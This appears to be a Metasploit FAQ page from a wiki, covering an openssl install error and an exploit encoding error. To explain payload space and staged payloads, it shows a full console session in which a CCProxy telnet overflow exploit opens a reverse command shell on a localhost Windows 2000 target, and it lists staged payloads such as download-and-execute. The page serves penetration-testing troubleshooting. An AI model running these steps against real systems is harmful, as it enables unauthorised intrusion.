Metasploit/Frequently Asked Questions
Installation[edit | edit source]
Errors[edit | edit source]
no such file to load -- openssl (LoadError)[edit | edit source]
Q: When running Metasploit for the first time, I get the error: no such file to load -- openssl (LoadError)
- Example:
[~/metasploit]# ./msfgui
./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
from ./lib/rex/socket/ssl_tcp_server.rb:4
from ./lib/rex/socket/comm/local.rb:5:in `require'
from ./lib/rex/socket/comm/local.rb:5
from ./lib/rex/socket.rb:22:in `require'
from ./lib/rex/socket.rb:22
from ./lib/rex.rb:71:in `require'
from ./lib/rex.rb:71
from ./msfgui:10:in `require'
from ./msfgui:10
A: Metasploit requires the Ruby implementation of openssl - not the standard C implementation of openssl used by Apache etc. Install the relevant ruby-openssl library.
- Example (for Debian - check your OS or try using gem):
pwebster@metasploit:~$ apt-cache search ruby | grep openssl libopenssl-ruby - OpenSSL interface for Ruby libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8 libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9 pwebster@metasploit:~# apt-get install libopenssl-ruby
Exploit Modules[edit | edit source]
Errors[edit | edit source]
Exploit failed: No encoders encoded the buffer successfully[edit | edit source]
Q: After setting all the required parameters for an exploit module and running exploit, I receive the following error: [-] Exploit failed: No encoders encoded the buffer successfully.
- Example:
msf > use windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) > info
Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
Version: $Revision$
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
Patrick Webster <patrick [at] aushack.com>
Available targets:
Id Name
-- ----
0 Windows 2000 Pro SP0 - English
1 Windows 2000 Pro SP1 - English
2 Windows 2000 Pro SP2 - English
3 Windows 2000 Pro SP3 - English
4 Windows 2000 Pro SP4 - English
5 Windows XP SP0/1 - English
6 Windows 2003 Server SP0/1 - English
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 127.0.0.1 yes The target address
RPORT 23 yes The target port
Payload information:
Space: 200
Avoid: 5 characters
Description:
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet
service. The stack is overwritten when sending an overly long
address to the 'ping' command.
msf exploit(ccproxy_telnet_ping) > set TARGET 4
TARGET => 4
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ccproxy_telnet_ping) > check
[*] The target appears to be vulnerable.
msf exploit(ccproxy_telnet_ping) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
A: The payloads available (show payloads) are determined by the memory 'Space' available for the exploit to use. In the above example, the payload space is: 'Space: 200'. However, the target application does not allow certain characters to be used (usually the null character 0x00 as this denotes the end of a string [character array]). In the example the payload cannot permit five characters: 'Avoid: 5 characters '
When you run the exploit, the payload generators will attempt to fit your desired payload into a space of 200 which excludes 5 specific characters. This is not always possible, and will result in the error: No encoders encoded the buffer successfully.
However, all is not lost. The Metasploit Framework includes the ability to support staged payloads. A staged payload is a significantly smaller payload which, instead of executing your desired action (such as reverse shell), will start a staging platform which can then add to that platform. So in our example, instead of a complete reverse shell, it will:
- Create the staging platform.
- Allocate enough memory to hold your desired payload.
- Obtain the rest of the payload from you.
- Execute the payload as a whole.
Generally, all the staged exploits are denoted by the '/' after the desired payload. Some examples are:
windows/dllinject/reverse_tcp Windows Inject DLL, Reverse TCP Stager windows/download_exec/bind_tcp Windows Executable Download and Execute, Bind TCP Stager windows/exec/find_tag Windows Execute Command, Find Tag Ordinal Stager windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager windows/vncinject/reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager
So now that we know it cannot fit an 'Inline' payload, we can use a stager instead:
... msf exploit(ccproxy_telnet_ping) > exploit [-] Exploit failed: No encoders encoded the buffer successfully. msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ccproxy_telnet_ping) > exploit [*] Started reverse handler [*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23... [*] Sending stage (474 bytes) [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\Documents and Settings\Administrator>